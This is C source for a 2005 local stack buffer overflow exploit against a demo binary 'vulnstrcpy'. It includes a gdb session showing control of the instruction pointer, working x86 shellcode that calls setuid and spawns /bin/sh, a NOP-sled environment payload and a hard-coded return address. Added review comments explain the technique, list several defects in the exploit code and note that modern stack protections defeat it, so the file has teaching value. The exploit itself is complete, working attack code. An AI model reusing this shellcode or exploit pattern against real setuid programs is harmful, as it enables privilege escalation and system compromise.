/** Local ./vulnstrcpy demo exploit by Hugo Martin (2005) [www.hackcraft.com] Tested on: (Should work on any Distro) -Slackware v10.1 -Fedora C3 -Debian Sarge **/ /** sh-3.00$ gdb ./vulnstrcpy GNU gdb 6.3 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/lib thread_db.so.1". (gdb) run `perl -e "print 'A'x268"``perl -e "print 'x'x4"` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/hugomartin/learning/bof/vulnstrcpy `perl -e "print 'A'x268"``perl -e "print 'x'x4"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxxxx Program received signal SIGSEGV, Segmentation fault. 0x78787878 in ?? 
() (gdb) info reg
eax 0x112 274
ecx 0x40145840 1075075136
edx 0x112 274
ebx 0x40144ff4 1075073012
esp 0xbffff5f0 0xbffff5f0
ebp 0x41414141 0x41414141
esi 0xbffff650 -1073744304
edi 0x2 2
eip 0x78787878 0x78787878
eflags 0x10282 66178
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb) run `perl -e "print 'A'x268"``perl -e "print 'x'x4"` **/

/*
 * Review notes (2005-era demo, 32-bit Linux/x86):
 * - The header names were lost in extraction; the functions used below
 *   (memset/strlen/memcpy, putenv, printf, execl) come from <string.h>,
 *   <stdlib.h>, <stdio.h> and <unistd.h>.
 * - The technique depends on an executable stack and on a stack layout
 *   that is identical from run to run. NX/DEP, ASLR and stack canaries,
 *   which current toolchains and kernels enable by default, each remove
 *   one of those assumptions; this is what the demo teaches about the
 *   cost of an unchecked strcpy() into a fixed-size buffer.
 */
#include
#include

void aborted(int); /* declared but neither defined nor called in this file */

/*
 * Payload stored in the EGG environment variable. Read straight from the
 * byte strings (not executed), it appears to: write a short banner
 * (al=4, int 0x80), call setuid (al=0x17), execve "/bin//sh" (al=0x0b)
 * and exit (al=1); the final bytes are padding. Confirm with a
 * disassembler before relying on that reading.
 */
char shellcode[]= /* HACKCRAFT shellcode */
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x54\x20\x20\x0a"
"\x68\x43\x52\x41\x46\x68\x48\x41\x43\x4b\x89\xe1"
"\xb2\x0f\xb0\x04\xcd\x80\x31\xc0\x31\xc0\x31\xdb"
"\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e\x2f"
"\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24"
"\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0"
"\xb0\x01\xcd\x80\x5d\xc3\x8d\x76\x00";

/*
 * Builds the classic two-part stack smash shown in the gdb session above:
 * a NOP sled plus shellcode in the environment (EGG), and an argv[1] of
 * 268 NOP bytes followed by a hard-coded address that is expected to fall
 * inside that sled. The gdb run shows that bytes 269-272 of argv[1] end
 * up in eip, which fixes the offset used here.
 *
 * Defects as written (left untouched, noted for the reader):
 * - main() has no return type (implicit int, invalid since C99) and
 *   returns nothing.
 * - buf has 272 elements, so buf[272] = 0x00 writes one past the end
 *   (undefined behavior); the later strlen(buf) depends on that byte.
 * - strlen() returns size_t, but i is an int and the result is printed
 *   with %d (signed/unsigned mismatch, format/argument mismatch).
 * - execl()'s return value (it only returns on failure) is ignored.
 */
main()
{
    /* Absolute stack address chosen for the test systems (no ASLR);
     * presumably tuned from the esp value in the gdb session above. */
    unsigned long ret = 0xbffffd30;
    char buf[272];
    char egg[1024];
    char *ptr;
    int i=0;

    /* argv[1]: every byte a NOP (0x90) until the return-address slot. */
    memset(buf,0x90,sizeof(buf));

    /* egg: NOPs up to the shellcode, the shellcode, then a terminating NUL.
     * The loop bounds are size_t, so i is compared as unsigned. */
    ptr = egg;
    for (i = 0; i < 1024 - strlen(shellcode) -1; i++)
        *(ptr++) = '\x90';
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    egg[1024 - 1] = '\0';

    /* The first four sled bytes become the variable name, "EGG=". */
    memcpy(egg,"EGG=",4);
    /* putenv() keeps the pointer to egg itself; that is fine only because
     * the process exec()s before egg goes out of scope. */
    putenv(egg);

    /* Little-endian store of ret at offset 268 (the slot gdb shows in eip). */
    buf[268] = (ret & 0x000000ff);
    buf[269] = (ret & 0x0000ff00) >> 8;
    buf[270] = (ret & 0x00ff0000) >> 16;
    buf[271] = (ret & 0xff000000) >> 24;
    buf[272] = 0x00; /* out of bounds: buf[271] is the last element */

    printf("=================================================================\n");
    printf(" ./vulnstrcpy Demo Local Exploit \n\n");
    printf(" by Hugo Martin [ www.hackcraft.com ] \n");
    printf("=================================================================\n");
    printf("ret: 0x%x\n",ret);
    printf("buf: %d\n\n",strlen(buf)); /* size_t printed with %d */

    /* Relative path: resolves against the current directory, not $PATH.
     * Failure (e.g. binary not present) is not reported. */
    execl("vulnstrcpy", "vulnstrcpy", buf, NULL);
}